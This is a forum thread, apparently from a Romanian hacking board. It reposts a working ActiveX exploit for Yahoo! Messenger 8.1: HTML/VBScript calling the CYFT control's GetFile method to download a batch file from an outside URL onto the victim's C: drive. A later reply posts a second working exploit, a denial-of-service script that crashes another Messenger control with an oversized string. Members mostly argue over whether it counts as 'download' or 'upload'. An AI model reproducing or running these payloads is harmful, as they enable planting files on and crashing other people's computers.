nullbyte Posted September 19, 2007 Report Share Posted September 19, 2007 <pre><code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------[b]Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download[/b]url: [url]http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe[/url]Author: shinnaimail: shinnai[at]autistici[dot]orgsite: [url]http://shinnai.altervista.org[/url][b]<font color='red'>This was written for educational purpose. Use it at your own risk.Author will be not responsible for any damage.</font>[/b]Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7[b]Marked as:RegKey Safe for Script: FalseRegkeySafe for Init: FalseKillBitSet: False[/b]From remote: depends by Internet Explorer settingsFrom local: yes[b]Description:This contron contains a "GetFile()" method which allows to download, onuser's pc, an arbitrary file pased as argument.Remote execution depends by Internet Explorer settings, local executionworks very well.[/b][b]greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration[/b]-----------------------------------------------------------------------------<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object><input language=VBScript onclick=tryMe() type=button value='Click here to start the test'><script language='vbscript'>Sub tryMetest.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai"MsgBox "Exploit completed"End Sub</script></span></span></code></pre> Quote Link to comment Share on other sites More sharing options...
Ras Posted September 19, 2007 Report Share Posted September 19, 2007 imi explica si mie cineva ce face acest exploit? ca sa nu mor prost... Quote Link to comment Share on other sites More sharing options...
nullbyte Posted September 19, 2007 Author Report Share Posted September 19, 2007 test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai" Teoretic ar trebui sa deschida un cmd cu textul de la acea adresa. Pe IE6 nu merge... Pe IE7 nu am incercat :? Quote Link to comment Share on other sites More sharing options...
kw3rln Posted September 19, 2007 Report Share Posted September 19, 2007 ce ai inteles de aici:This contron contains a "GetFile()" method which allows to download, onuser's pc, an arbitrary file pased as argument.Remote execution depends by Internet Explorer settings, local executionworks very well.? Quote Link to comment Share on other sites More sharing options...
nullbyte Posted September 19, 2007 Author Report Share Posted September 19, 2007 Eu, personal am inteles, dar nici la scoala nu stau bine cu explicatu' Poate Ras s-a grabit sa citeasca? Quote Link to comment Share on other sites More sharing options...
Ras Posted September 19, 2007 Report Share Posted September 19, 2007 Contine "GetFile()" si prin acest "GetFile()" poti sa downloadezi din calculatorul victimei.Remote execution depinde de setarile IE-ului... Quote Link to comment Share on other sites More sharing options...
nullbyte Posted September 19, 2007 Author Report Share Posted September 19, 2007 au doamne sunt idiot Quote Link to comment Share on other sites More sharing options...
moubik Posted September 20, 2007 Report Share Posted September 20, 2007 Contine "GetFile()" si prin acest "GetFile()" poti sa downloadezi din calculatorul victimei.Remote execution depinde de setarile IE-ului...nu din calculatorul victimei, ci in calculatorul victimei Quote Link to comment Share on other sites More sharing options...
alien Posted September 20, 2007 Report Share Posted September 20, 2007 aia e upload nu download... da si eu inteleg la fel. sa uploadezi pe calc victimei un exe si sa-l ruleze. Quote Link to comment Share on other sites More sharing options...
nobus Posted December 28, 2007 Report Share Posted December 28, 2007 pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citeste Quote Link to comment Share on other sites More sharing options...
nullbyte Posted December 28, 2007 Author Report Share Posted December 28, 2007 pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citesteburn in hell Quote Link to comment Share on other sites More sharing options...
Guest BanKai Posted December 30, 2007 Report Share Posted December 30, 2007 pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citestedownload pt victimaupload pentru atacatorsi cum noi suntem atacatorii evident ca va fi numit uploadas apercia sa nu mai flamezi pe forum sau vei fi banat Quote Link to comment Share on other sites More sharing options...
dynasty Posted January 6, 2008 Report Share Posted January 6, 2008 pute a prostie pe aici nu gluma getfile este ceva de genul wget in linux shi spre disperarea voastra as putea sa il incadrez ca download nu upload deci daca esti prea bata taci shi citesteCe exemplu prost ai dat. In cazu' asta nu stiu cat de multe are in comun getfile() cu wget. Quote Link to comment Share on other sites More sharing options...
LLegoLLaS Posted March 25, 2009 Report Share Posted March 25, 2009 Ce exemplu prost ai dat. In cazu' asta nu stiu cat de multe are in comun getfile() cu wget.lasa-l asa....n desteptaciunea lui Quote Link to comment Share on other sites More sharing options...
hirosima Posted March 26, 2009 Report Share Posted March 26, 2009 va las si eu un DOS tot pentru yahoo messenger 8.1:Yahoo Messenger 8.1 (latest) Remote DoSSafe for Scripting, Safe for Initialize<html><body><object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object><script language=vbscript>arg1=String(517140, "A")target.c arg1</script></body></html> Quote Link to comment Share on other sites More sharing options...